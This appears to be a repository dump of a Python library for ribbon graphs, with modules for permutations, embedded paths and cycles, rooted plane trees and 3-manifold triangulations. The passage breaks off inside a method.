open('__init__.py').read()).group(1)
setup(
name = 'ribbon_graph',
version = version,
description = 'Ribbon Graphs',
long_description = long_description,
url = 'https://bitbucket.org/mobeidin/ribbon_graph',
author = 'Malik Obeidin',
author_email = 'mobeidin@illiois.edu',
license='GPLv2+',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Mathematics',
],
packages = ['ribbon_graph'],
package_dir = {'ribbon_graph':''},
ext_modules = [],
zip_safe = False,
)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,858
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/__init__.py
|
__version__ = '1.0'
def version():
return __version__
from ribbon_graph_base import RibbonGraph, random_link_shadow
from cycle import Path, EmbeddedPath, EmbeddedCycle
from maps import StrandDiagram, Link
from permutation import Bijection, Permutation
from trees import MountainRange, RootedPlaneTree
from decompositions import PolygonWithDiagonals, CycleTree
__all__ = ['RibbonGraph', 'Path', 'EmbeddedPath', 'EmbeddedCycle', 'StrandDiagram', 'Link', 'Permutation', 'Bijection', 'random_link_shadow']
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,859
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/cycle.py
|
import itertools
from local_moves import *
class Path(object):
def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = []):
self.ribbon_graph = ribbon_graph
self.start_label = start_label
if labels:
if labels[0] != start_label:
raise Exception("Starting label must be first in list of labels")
self.turn_degrees = self._compute_turn_degrees_from_labels(labels)
self.labels = labels
elif turn_degrees:
self.turn_degrees = turn_degrees
self.labels = self._compute_labels_from_turn_degrees(turn_degrees)
else:
raise Exception("Must specify list of half-edge labels or turn degrees")
self._make_turn_degrees_positive()
def _compute_labels_from_turn_degrees(self, turn_degrees):
labels = [self.start_label]
label = self.start_label
for d in turn_degrees:
label = self.ribbon_graph.opposite[label]
label = self.ribbon_graph.next.iterate(d, label)
labels.append(label)
return labels
def _make_turn_degrees_positive(self):
new_turn_degrees = []
for label, turn_degree in zip(self.labels[1:], self.turn_degrees):
vertex_valence = len(self.ribbon_graph.vertex(label))
new_turn_degrees.append( turn_degree % vertex_valence )
self.turn_degrees = new_turn_degrees
def _compute_turn_degrees_from_labels(self, labels):
turn_degrees = []
for i in range(len(labels)-1):
label, next_label = labels[i], labels[i+1]
op_label = self.ribbon_graph.opposite[label]
vertex = self.ribbon_graph.vertex(op_label)
turn_degrees.append(vertex.index(next_label))
return turn_degrees
def __repr__(self):
return "{}({})".format(self.__class__.__name__,self.labels)
def next_vertex(self):
return self.ribbon_graph.vertex( self.ribbon_graph.opposite[self.labels[-1]] )
def inverse_turn_degrees(self):
inverse_turn_degrees = []
opposite = self.ribbon_graph.opposite
labels = self.labels
for i in range(len(labels)-1):
label, next_label = labels[i], labels[i+1]
op_label = opposite[label]
vertex = self.ribbon_graph.vertex(op_label)
inverse_turn_degrees.append(len(vertex) - vertex.index(next_label))
return inverse_turn_degrees
class EmbeddedPath(Path):
def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = [], label_set = set([])):
if labels or turn_degrees:
super(EmbeddedPath,self).__init__(ribbon_graph,
start_label,
labels=labels,
turn_degrees = turn_degrees)
elif label_set:
self.ribbon_graph = ribbon_graph
self.start_label = start_label
labels = self._compute_labels_from_label_set(label_set)
super(EmbeddedPath,self).__init__(ribbon_graph,
start_label,
labels=labels,
turn_degrees = [])
else:
raise Exception("Must specify either labels, turn degrees, or the set of labels in the embedded path.")
self._verify_embedded()
def _compute_labels_from_label_set(self, label_set):
labels = []
label = self.start_label
while label_set:
labels.append(label)
label = self.ribbon_graph.opposite[label]
vertex = self.ribbon_graph.vertex(label)
possible_next_labels = [l for l in label_set if l in vertex]
if len(possible_next_labels) != 1:
raise Exception("Label set does not define path")
label = possible_next_labels[0]
label_set.remove(label)
return labels
def _verify_embedded(self):
vertices = [frozenset(self.ribbon_graph.vertex(label)) for label in self.labels]
if len(set(vertices)) < len(vertices):
raise Exception("Path is not embedded")
def possible_next_steps(self):
next_vertex = self.next_vertex()
for label in next_vertex:
if label in self.labels:
return []
return next_vertex[1:]
def possible_previous_steps(self):
start_vertex = self.ribbon_graph.vertex(self.start_label)[1:]
op_labels = [self.ribbon_graph.opposite[l] for l in start_vertex]
possible_previous_steps = []
for label in op_labels:
already_have_vertex = False
for other_vertex_label in self.ribbon_graph.vertex(label):
if other_vertex_label in self.labels:
already_have_vertex = True
break
if not already_have_vertex:
possible_previous_steps.append(label)
return possible_previous_steps
def one_step_continuations(self):
continuations = []
for label in self.possible_next_steps():
new_labels = self.labels[:]
new_labels.append(label)
continuations.append(EmbeddedPath(self.ribbon_graph, self.start_label, labels = new_labels) )
return continuations
def concatenate(self, other_embedded_path):
if self.ribbon_graph != other_embedded_path.ribbon_graph:
raise Exception("To concatenate EmbeddedPaths, must be paths in the same RibbonGraph.")
if other_embedded_path.start_label in self.possible_next_steps():
new_labels = self.labels[:]
new_labels.extend(other_embedded_path.labels)
return EmbeddedPath(self.ribbon_graph, self.start_label, new_labels)
else:
raise Exception("Paths cannot be concatenated.")
def is_completable_to_cycle(self):
return self.start_label in self.next_vertex()
def complete_to_cycle(self):
if self.is_completable_to_cycle():
new_labels = self.labels[:]
new_labels.append(self.start_label)
return EmbeddedCycle(self.ribbon_graph, self.start_label, labels=new_labels)
else:
raise Exception("Not completable to a cycle")
def __len__(self):
return len(self.labels)
def reversed(self):
op_labels = list(reversed([self.ribbon_graph.opposite[l] for l in self.labels]))
return EmbeddedPath(self.ribbon_graph, op_labels[0], labels = op_labels)
class EmbeddedCycle(Path):
"""
Turn degrees all -1 correspond to faces oriented in the same way as
the RibbonGraph (with the face to the left side).
"""
def __init__(self, ribbon_graph, start_label, labels = [], turn_degrees = [], label_set = set([])):
if labels or turn_degrees:
super(EmbeddedCycle,self).__init__(ribbon_graph,
start_label,
labels=labels,
turn_degrees = turn_degrees)
elif label_set:
self.ribbon_graph = ribbon_graph
self.start_label = start_label
labels = self._compute_labels_from_label_set(label_set)
super(EmbeddedCycle,self).__init__(ribbon_graph,
start_label,
labels=labels,
turn_degrees = [])
else:
raise Exception("Must specify either labels, turn degrees, or the set of labels in the embedded cycle.")
self._verify_embedded_up_to_final_label()
self._verify_cycle()
def _compute_labels_from_label_set(self, label_set):
labels = []
label = self.start_label
while label_set:
labels.append(label)
label = self.ribbon_graph.opposite[label]
vertex = self.ribbon_graph.vertex(label)
possible_next_labels = [l for l in label_set if l in vertex]
if len(possible_next_labels) != 1:
raise Exception("Label set does not define path")
label = possible_next_labels[0]
label_set.remove(label)
labels.append(self.start_label)
return labels
def _verify_embedded_up_to_final_label(self):
vertices = [frozenset(self.ribbon_graph.vertex(label)) for label in self.labels[:-1]]
if len(set(vertices)) < len(vertices):
raise Exception("Cycle is not embedded")
def _verify_cycle(self):
if self.labels[-1] != self.start_label:
raise Exception("Not a cycle")
def __len__(self):
return len(self.labels)-1
def starting_at(self, new_start_label):
"""
Start the cycle at new_start_label instead.
"""
i = self.labels.index(new_start_label)
new_labels = self.labels[i:-1]
new_labels.extend(self.labels[:i])
new_labels.append(new_start_label)
return EmbeddedCycle(self.ribbon_graph, new_start_label, new_labels)
def left_side_labels(self):
left_sides = []
next_inv = self.ribbon_graph.next.inverse()
inv_turn_degrees = self.inverse_turn_degrees()
for label, turn_degree in zip(self.labels[:-1],inv_turn_degrees):
next_label = self.ribbon_graph.opposite[label]
left_side_labels = []
for j in range(turn_degree-1):
next_label = next_inv[next_label]
left_side_labels.append(next_label)
left_sides.append(left_side_labels)
return left_sides
def right_side_labels(self):
right_sides = []
for label, turn_degree in zip(self.labels[:-1],self.turn_degrees):
next_label = self.ribbon_graph.opposite[label]
right_side_labels = []
for j in range(turn_degree-1):
next_label = self.ribbon_graph.next[next_label]
right_side_labels.append(next_label)
right_sides.append(right_side_labels)
return right_sides
def with_previous_labels(self):
opposites = [self.ribbon_graph.opposite[l] for l in self.labels[:-1]]
last = opposites.pop()
opposites.insert(0, last)
return zip(self.labels,opposites)
def cut(self):
R = self.ribbon_graph.copy()
for l in self.labels[:-1]:
o = R.opposite[l]
double_edge(R, l, str(l)+'new', str(o)+'new')
for l, p in self.with_previous_labels():
split_vertex(R, l, str(p)+'new')
return R
def left_side(self):
R = self.ribbon_graph.copy()
right_side_labels = [l for labels in self.right_side_labels() for l in labels]
return R.disconnect_vertices(right_side_labels).restricted_to_connected_component_containing(self.start_label)
def reversed(self):
op_labels = list(reversed([self.ribbon_graph.opposite[l] for l in self.labels]))
return EmbeddedCycle(self.ribbon_graph, op_labels[0], labels = op_labels)
def symmetric_difference(self, other_embedded_path):
if self.ribbon_graph != other_embedded_path.ribbon_graph:
raise Exception("To take symmetric difference, both cycles must be in the same ribbon graph.")
label_set = set(self.labels)
other_label_set = set(other_embedded_path.labels)
symmetric_difference = label_set.symmetric_difference(other_label_set)
for start_label in symmetric_difference:
break
return EmbeddedCycle(self.ribbon_graph, start_label, label_set=symmetric_difference)
def oriented_sum(self, other_embedded_path):
if self.ribbon_graph != other_embedded_path.ribbon_graph:
raise Exception("To take symmetric difference, both cycles must be in the same ribbon graph.")
label_set = set(self.labels)
other_label_set = set(other_embedded_path.labels)
new_labels = label_set.union(other_label_set)
for label in self.labels:
op_label = self.ribbon_graph.opposite[label]
if (label in new_labels) and (op_label in new_labels):
new_labels.remove(label)
new_labels.remove(op_label)
for start_label in new_labels:
break
return EmbeddedCycle(self.ribbon_graph, start_label, label_set=new_labels)
def split_at_two_points(self, label1, label2):
"""
Split into two EmbeddedPaths, one starting at label1, and going
to the label before label2, and the other starting at label2 and going
to the label before label1.
One should be to do path1.concatenate(path2).complete_to_cycle() to
return to the original cycle.
"""
rotated1 = self.starting_at(label1)
dist_1to2 = rotated1.labels.index(label2)
labels1 = rotated1.labels[ : dist_1to2 ]
rotated2 = self.starting_at(label2)
dist_2to1 = rotated2.labels.index(label1)
labels2 = rotated2.labels[ : dist_2to1 ]
return EmbeddedPath(self.ribbon_graph, label1, labels = labels1), EmbeddedPath(self.ribbon_graph, label2, labels = labels2)
def split_along_path(self, splitting_path):
"""
Given an EmbeddedPath going through starting on the left side of
the boundary, and ending on the left side of the boundary, use this
path to split self into two cycles which each have a portion of self.
boundary.
"""
for label1 in splitting_path.possible_next_steps():
if label1 in self.labels:
break
start_vertex = splitting_path.ribbon_graph.vertex(splitting_path.labels[0])
for label2 in start_vertex:
if label2 in self.labels:
break
boundary1, boundary2 = self.split_at_two_points(label1, label2)
cycle1 = splitting_path.concatenate(boundary1).complete_to_cycle()
cycle2 = splitting_path.reversed().concatenate(boundary2).complete_to_cycle()
return cycle1, cycle2
def cycle_from_lace_component(ribbon_graph, label):
lc = ribbon_graph.lace_component(label)
lc.append(lc[0])
return EmbeddedCycle(ribbon_graph, lc[0], lc)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,860
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/trees.py
|
from ribbon_graph_base import RibbonGraph
from permutation import Permutation
from random import shuffle
class MountainRange(object):
def __init__(self, steps = []):
s = 0
for step in steps:
assert step in [-1,1]
s += step
assert s >= 0
assert s == 0
self.steps = steps
def rooted_plane_tree(self):
"""
Mountain ranges give rooted plane trees in a canonical way.
"""
steps = self.steps
s = 0
stack = []
paired_labels = []
for i, step in enumerate(steps):
if step == 1:
stack.append(i)
else:
paired_labels.append( [stack.pop(), i])
opposite = Permutation(cycles = paired_labels)
next_corner = Permutation(cycles = [range(len(steps))])
return RootedPlaneTree(0, permutations = [opposite, next_corner.inverse()*opposite])
def random_mountain_range(n):
steps = [1]*n
steps.extend( [-1]*n )
shuffle(steps)
s = 0
for i, step in enumerate(steps):
s, last_s = s+step, s
if s < 0 or last_s < 0 :
steps[i] = -step
return MountainRange(steps)
def remy_random_rooted_binary_plane_tree(n):
tree = Y()
for i in range(n):
tree = tree.insert_leaf_on_edge(tree.random_label(), [(i,j) for j in range(4)])
return tree
class RootedPlaneTree(RibbonGraph):
def __init__(self, root, permutations = []):
super(RootedPlaneTree,self).__init__( permutations = permutations )
assert root in self.labels()
self.root = root
if len(self.faces())>1:
raise Exception("Map is not a tree")
def insert_leaf_on_edge(self, label, new_labels):
picture_to_insert, boundary_labels = open_Y(new_labels)
pairings = [(label,boundary_labels[0]),(self.opposite[label],boundary_labels[1])]
new_tree = self.disconnect_edges([label])
new_tree = new_tree.union(picture_to_insert)
new_tree = new_tree.connect_edges(pairings)
return RootedPlaneTree(self.root, [new_tree.opposite, new_tree.next])
def relabeled(self):
R = self.relabeled_by_root(self.root)
return RootedPlaneTree(1,[R.opposite, R.next])
def open_Y(new_labels):
l0,l1,l2,l3 = new_labels
return RootedPlaneTree(l0, [Permutation(cycles = [(l0,),(l1,),(l2,l3)]) ,
Permutation(cycles = [(l0,l1,l2), (l3,)])]), (l0,l1)
def Y():
return RootedPlaneTree(0, [Permutation(cycles = [(0,3),(1,4),(2,5)]) ,
Permutation(cycles = [(0,1,2), (3,), (4,), (5,)])])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,861
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/permutation.py
|
#from sage.all import Permutation as SagePermutation
from random import shuffle
class Bijection(dict):
def __init__(self, dictionary={}, verify=True):
self.domain = set()
self.codomain = set()
for label in dictionary:
self[label] = dictionary[label]
if verify:
assert len(self.domain) == len(self.codomain)
def __setitem__(self, label, output_label):
# if label in self.domain:
# raise Exception("Cannot change function value at {}".format(label))
# if output_label in self.codomain:
# raise Exception("Output {} already in codomain ".format(output_label))
super(Bijection,self).__setitem__(label,output_label)
self.domain.add(label)
self.codomain.add(output_label)
def add_label(self, label, output_label):
if label in self.domain:
raise Exception("Cannot change function value at {}".format(label))
if output_label in self.codomain:
raise Exception("Output {} already in codomain ".format(output_label))
super(Bijection,self).__setitem__(label,output_label)
self.domain.add(label)
self.codomain.add(output_label)
def remove_label(self, label):
output = self.pop(label)
self.domain.remove(label)
self.codomain.remove(output)
def __repr__(self):
return ''.join(['{}->{}\n'.format(label,self[label]) for label in self])
def act(self, label):
if label not in self:
return label
else:
return self[label]
def composed_with(self,other_bijection):
if self.codomain == other_bijection.domain:
return Bijection({label: other_bijection[self[label]] for label in self })
else:
raise Exception("Domain/codomain don't match")
def inverse(self):
return Bijection({self[label]:label for label in self})
def restricted_to(self, labels):
return Bijection({label: self[label] for label in labels})
class Permutation(Bijection):
def __init__(self, dictionary={}, cycles = [], verify=True):
super(Permutation,self).__init__(dictionary=dictionary,verify=False)
for cycle in cycles:
self.add_cycle(cycle)
if verify:
self.verify()
def __mul__(self,other_permutation):
combined_labels = self.labels().union(other_permutation.labels())
return Permutation({label: other_permutation.act(self.act(label)) for label in combined_labels })
def add_cycle(self,cycle):
for i in range(len(cycle)):
self.add_label(cycle[i], cycle[(i+1)%len(cycle)])
# self[cycle[i]] = cycle[(i+1)%len(cycle)]
def verify(self):
assert self.domain == self.codomain
def fixed_points_removed(self):
return Permutation({label: self[label] for label in self if label!=self[label]})
def fixed_points(self):
return set(i for i in self if self[i]==i)
def labels(self):
return set(self.domain)
def cycle(self, label):
c = [label]
next_label = self[label]
while next_label != label:
c.append(next_label)
next_label = self[next_label]
return c
def cycles(self):
labels = self.labels()
cycles = []
while labels:
label = labels.pop()
cycle = self.cycle(label)
cycles.append(cycle)
labels = labels-set(cycle)
return cycles
def inverse(self):
return Permutation({self[label]:label for label in self})
def previous(self, label):
"""
Return the element which is sent to label. Hopefully faster than
computing the entire inverse.
"""
return self.cycle(label)[-1]
def restricted_to(self, labels):
for label in labels:
assert self[label] in labels
return Permutation({label: self[label] for label in labels})
def relabeled(self, bijection):
return Permutation(bijection.inverse().composed_with(self).composed_with(bijection))
def relabel_with_integers(self):
relabeling = Bijection({l:i for i,l in enumerate(self.labels())})
return self.relabeled(relabeling), relabeling
def sage(self):
labels = list(self.labels())
cycles = self.cycles()
i_cycles = [tuple([labels.index(label)+1 for label in cycle]) for cycle in cycles]
print(i_cycles)
return SagePermutation(i_cycles)
def iterate(self, n, label):
if n<0:
inverse = self.inverse()
for i in range(abs(n)):
label = inverse[label]
return label
elif n>0:
for i in range(n):
label = self[label]
return label
else:
return label
def undo_two_cycle(self, label):
"""
If label is in a two-cycle, then force label and self[label] to be
fixed points of self. This will correspond to cutting an edge in a
RibbonGraph. Note that this does not make a new permutation object,
it alters the internal data of self.
"""
cycle = self.cycle(label)
if len(cycle) == 2:
for l in cycle:
self[l] = l
else:
raise Exception("Given label not in 2-cycle")
def insert_after(self, previous_label, new_label):
"""
Insert new_label into the cycle containing previous_label, between
previous_label and self[previous_label]. That is, change
previous_label --> self[previous_label]
to
previous_label --> new_label --> self[previous_label]
This function does not make a new Permutation; it alters self.
new_label must not be already in the permutation.
"""
if new_label in self:
raise Exception("Cannot insert label because it is already used in the permutation")
self[new_label] = self[previous_label]
self[previous_label] = new_label
def split_cycle_at(self, label1, label2):
"""
Takes two labels on the same cycle and splits the cycle into two.
It short-circuits the cycle after label1 to skip to the label after
label2, and vice versa. Here's an example:
sage: P = Permutation(cycles = [(1,2,3,4,5)])
sage: P.split_cycle_at(3,5)
sage: P.cycles()
[[1, 2, 3], [4, 5]]
This will correspond to splitting a vertex for ribbon graphs. This
function doesn't make a new permutation, it alters self.
Equivalent to multiplying on the left by the transposition
(label1 label2)
"""
if label2 not in self.cycle(label1):
raise Exception("The two labels are not on the same cycle.")
label1_next = self[label1]
label2_next = self[label2]
self[label1] = label2_next
self[label2] = label1_next
def split_label_from_cycle(self, label):
"""
Takes a single label and disconnect from the rest of its cycle.
"""
self.split_cycle_at(label, self.previous(label))
def merge_cycles_at(self, label1, label2):
"""
Takes two labels on different cycles and merge the cycles into one.
It short-circuits the cycle after label1 to skip to the label after
label2, and vice versa. Here's an example:
sage: P = Permutation(cycles = [(1,2,3,4,5)])
sage: P.split_cycle_at(3,5)
sage: P.cycles()
[[1, 2, 3], [4, 5]]
This will correspond to merging a vertex for ribbon graphs. This
function doesn't make a new permutation, it alters self.
Equivalent to multiplying on the left by the transposition
(label1 label2)
"""
if label2 in self.cycle(label1):
raise Exception("The two labels are on the same cycle.")
label1_next = self[label1]
label2_next = self[label2]
self[label1] = label2_next
self[label2] = label1_next
def remove_cycle(self, label):
for l in self.cycle(label):
self.remove_label(l)
def remove_fixed_point(self, label):
if label == self[label]:
self.remove_label(label)
else:
raise Exception("Given label not a fixed point.")
def union(self, other_permutation):
U = Permutation()
for i in self:
U[i] = self[i]
for i in other_permutation:
U[i] = other_permutation[i]
return U
def append_label(self, extra_label):
"""
Append an addition specified label onto every label in the permutation.
L --> (L, extra_label)
"""
return Permutation({(label,extra_label):(self[label],extra_label) for label in self})
def disjoint_union(self, other_permutation):
combined = {}
for label in self:
combined[(label,0)] = (self[label],0)
for label in other_permutation:
combined[(label,1)] = (other_permutation[label],1)
return Permutation(combined)
def is_identity(self):
for label in self:
if self[label] != label:
return False
return True
def make_commute_along_cycles(self, smaller_permutation):
"""
Given a permutation which acts on a subset of self.labels, try and
extend the smaller permutation to a permutation on all of self.labels
which commutes with self.
"""
smaller_permutation = Permutation(smaller_permutation.copy())
for label in smaller_permutation.labels():
label_cycle = self.cycle(label)
pushed_label_cycle = self.cycle(smaller_permutation[label])
if len(label_cycle) != len(pushed_label_cycle):
raise Exception("The permutation can't be extended to commute.")
for l1, l2 in zip(label_cycle,pushed_label_cycle):
if l1 in smaller_permutation:
if smaller_permutation[l1] != l2:
raise Exception("The permutation can't be extended to commute.")
smaller_permutation[l1]=l2
return smaller_permutation
def permutation_from_bijections(bijections):
B = Bijection()
for bijection in bijections:
for key in bijection:
B[key] = bijection[key]
return Permutation(B)
def random_permutation(labels):
permuted_labels = list(labels)
shuffle(permuted_labels)
return Permutation({l1: l2 for l1,l2 in zip(labels,permuted_labels)})
def random_cycle(labels):
shuffle(labels)
return Permutation(cycles=[labels])
def four_cycles(num_vertices):
return Permutation(cycles=[[4*i,4*i+1,4*i+2,4*i+3] for i in range(num_vertices)])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,862
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/three_manifold.py
|
from permutation import Permutation, Bijection
from ribbon_graph_base import *
from cycle import *
from local_moves import contract_edge
class Triangulation(object):
def __init__(self, tetrahedra_ribbon_graph, glued_to, check_consistency = True):
"""
Specify a triangulation of a 3-manifold with:
tetrahedra_ribbon_graph: a ribbon graph whose faces are all
size 3, and whose connected components are all
the tetrahedral map.
glued_to: a permutation which shows which faces are glued.
A directed edge in a tetrahedron uniquely specifies
how to glue two faces, by gluing the faces to the left
of each directed edge. This permutation must commute with
the next_corner permutation of the tetrahedra_ribbon_graph
to make it so that faces are glued consistently.
"""
self.tetrahedra_ribbon_graph = tetrahedra_ribbon_graph
if check_consistency:
next_corner = self.tetrahedra_ribbon_graph.next_corner()
glued_to = next_corner.make_commute_along_cycles(glued_to)
self.glued_to = glued_to
def tetrahedra(self):
return self.tetrahedra_ribbon_graph.connected_components()
def edges(self):
return (self.tetrahedra_ribbon_graph.next * D.glued_to).cycles()
def vertex_links(self):
return RibbonGraph([self.glued_to, self.tetrahedra_ribbon_graph.next.inverse()])
class TruncatedTetrahedron(object):
def __init__(self, tet):
self.tetrahedron = tet
self.ribbon_graph = truncate_vertices(tetrahedron().dual())
self.pairing = self.snappy_tetrahedron_to_edge_pairing()
self.labeled = self.labeled_ribbon_graph()
def vertex(self, directed_edge):
"""
From a directed edge 'ab', get the vertex in the truncated tetrahedron
which has this vertex. Each directed edge in the original tetrahedron
corresponds to a vertex in the truncated tetrahedron.
"""
return self.ribbon_graph.vertex(directed_edge)
def boundary_edge_from_directed_edge(self, directed_edge):
"""
Return a label on the triangular face on which the vertex corresponding
to directed_edge is located.
"""
return self.ribbon_graph.next[directed_edge]
def boundary_triangle_from_directed_edge(self, directed_edge):
return self.ribbon_graph.face(self.ribbon_graph.next[directed_edge])
def snappy_tetrahedron_to_edge_pairing(self):
tet = self.tetrahedron
gluing = tet.Gluing
neighbor = tet.Neighbor
directed_edge_choices = ['32','23','10','01']
corresponding_left_faces = [7, 11, 13, 14] #[F3, F2, F1, F0]
permutations = [Permutation(gluing[i].dict) for i in corresponding_left_faces]
corresponding_neighbors = [neighbor[i].Index for i in corresponding_left_faces]
pairing = []
for e, perm, index in zip(directed_edge_choices,permutations, corresponding_neighbors):
print(tet.Index, index)
print(perm)
vs = self.boundary_edge_from_directed_edge(e)
new_e = ''.join(reversed([str(perm[int(v)]) for v in e]))
new_vs = self.boundary_edge_from_directed_edge(new_e)
# new_vs = ''.join([new_vs[2], new_vs[3], new_vs[0], new_vs[1]])
print(e,new_e)
print(vs, new_vs)
print(self.ribbon_graph.face(vs), self.ribbon_graph.face(new_vs))
pairing.append( (str(tet.Index)+vs, str(index)+new_vs) )
print('\n\n')
return pairing
def labeled_ribbon_graph(self):
l = str(self.tetrahedron.Index)
new_opposite = {(l+i):(l+self.ribbon_graph.opposite[i]) for i in self.ribbon_graph.opposite}
new_next = {(l+i):(l+self.ribbon_graph.next[i]) for i in self.ribbon_graph.next}
return RibbonGraph([Permutation(new_opposite), Permutation(new_next)])
def heegaard_surface(mcomplex):
truncated_tets = [TruncatedTetrahedron(tet) for tet in mcomplex.Tetrahedra]
truncated_tet = truncated_tets.pop()
R = truncated_tet.labeled
pairings = [truncated_tet.pairing]
for truncated_tet in truncated_tets:
R = R.union(truncated_tet.labeled)
pairings.append(truncated_tet.pairing)
print(pairings)
all_face_labels = []
for pairing in pairings:
for label1, label2 in pairing:
all_face_labels.append((R.face(label1), R.face(label2)))
print(all_face_labels)
for pairing in pairings:
for label1, label2 in pairing:
labels = R.labels()
if (label1 in labels) and (label2 in labels):
R = R.glue_faces(label1, label2)
return R
N = 0 # 0000
V0 = 1 # 0001
V1 = 2 # 0010
E01 = 3 # 0011 <-----|
V2 = 4 # 0100 |
E02 = 5 # 0101 <---| |
E21 = 6 # 0110 <-| | |
F3 = 7 # 0111 | | |
V3 = 8 # 1000 | | | Opposite edges
E03 = 9 # 1001 <-| | |
E13 = 10 # 1010 <---| |
F2 = 11 # 1011 |
E32 = 12 # 1100 <-----|
F1 = 13 # 1101
F0 = 14 # 1110
T = 15 # 1111
# User-friendly?
E10 = 3
E20 = 5
E12 = 6
E30 = 9
E31 = 10
E23 = 12
# A simplex is oriented like this:
# 1
# /|\
# / | \
# / | \
# 2---|---3
# \ | /
# \ | /
# \|/
# 0
#
def tetrahedron(label=None):
next = Permutation(cycles=[('01','02','03'),
('12','10','13'),
('20','21','23'),
('30','32','31')])
opposite = Permutation(cycles=[('01','10'),
('02','20'),
('03','30'),
('12','21'),
('13','31'),
('23','32')])
if label:
return RibbonGraph([opposite.append_label(label), next.append_label(label)])
else:
return RibbonGraph([opposite, next])
def tetrahedron_old(label=None):
next = Permutation(cycles=[((0,1),(0,3),(0,2)),
((1,2),(1,3),(1,0)),
((2,0),(2,3),(2,1)),
((3,0),(3,1),(3,2))])
opposite = Permutation(cycles=[((0,1),(1,0)),
((0,2),(2,0)),
((0,3),(3,0)),
((1,2),(2,1)),
((1,3),(3,1)),
((2,3),(3,2))])
if label:
return RibbonGraph([opposite.append_label(label), next.append_label(label)])
else:
return RibbonGraph([opposite, next])
def snappy_tetrahedron_to_face_gluings(snappy_tetrahedron):
directed_edge_choices = ['01','10','23','32']
corresponding_left_faces = [7, 11, 13, 14] #[F3, F2, F1, F0]
permutations = [Permutation(snappy_tetrahedron.Gluing[i].dict) for i in corresponding_left_faces]
neighbor_indices = [snappy_tetrahedron.Neighbor[i].Index for i in corresponding_left_faces]
T = tetrahedron()
face_pairing = []
edge_pairing = []
face_label_pairing = []
i = snappy_tetrahedron.Index
for directed_edge, permutation, neighbor_i in zip(directed_edge_choices, permutations, neighbor_indices):
directed_edge_permuted = ''.join(reversed([str(permutation[int(s)]) for s in directed_edge]))
edge_pairing.append([(i,directed_edge), (neighbor_i,directed_edge_permuted)])
face_pairing.append([(i,T.face(directed_edge)), (neighbor_i,T.face(directed_edge_permuted))])
missing_label = set('0123')-set(T.face(directed_edge)[0])-set(T.face(directed_edge)[1])-set(T.face(directed_edge)[2])
missing_label = missing_label.pop()
missing_neighbor_label = set('0123')-set(T.face(directed_edge_permuted)[0])-set(T.face(directed_edge_permuted)[1])-set(T.face(directed_edge_permuted)[2])
missing_neighbor_label = missing_neighbor_label.pop()
face_label_pairing.append(['F{} of tet{}'.format(missing_label, i),'F{} of tet{}'.format(missing_neighbor_label, neighbor_i)])
return face_label_pairing
class Tetrahedron(object):
def __init__(self, snappy_tetrahedron):
self.ribbon_graph = tetrahedron()
self.cut_ribbon_graph = truncate_vertices(thicken_edges(tetrahedron()))
self.snappy_tetrahedron = snappy_tetrahedron
self.snappy_label_to_code = {0:14, 1:13, 2:11, 3:7}
def face_from_missing_vertex(self, v):
if v == 0:
return self.ribbon_graph.face('32')
elif v == 1:
return self.ribbon_graph.face('23')
elif v == 2:
return self.ribbon_graph.face('10')
elif v == 3:
return self.ribbon_graph.face('01')
else:
raise Exception()
def face_from_snappy_label(self, i):
if i == 14:
return self.ribbon_graph.face('32')
elif i == 13:
return self.ribbon_graph.face('23')
elif i == 11:
return self.ribbon_graph.face('10')
elif i == 7:
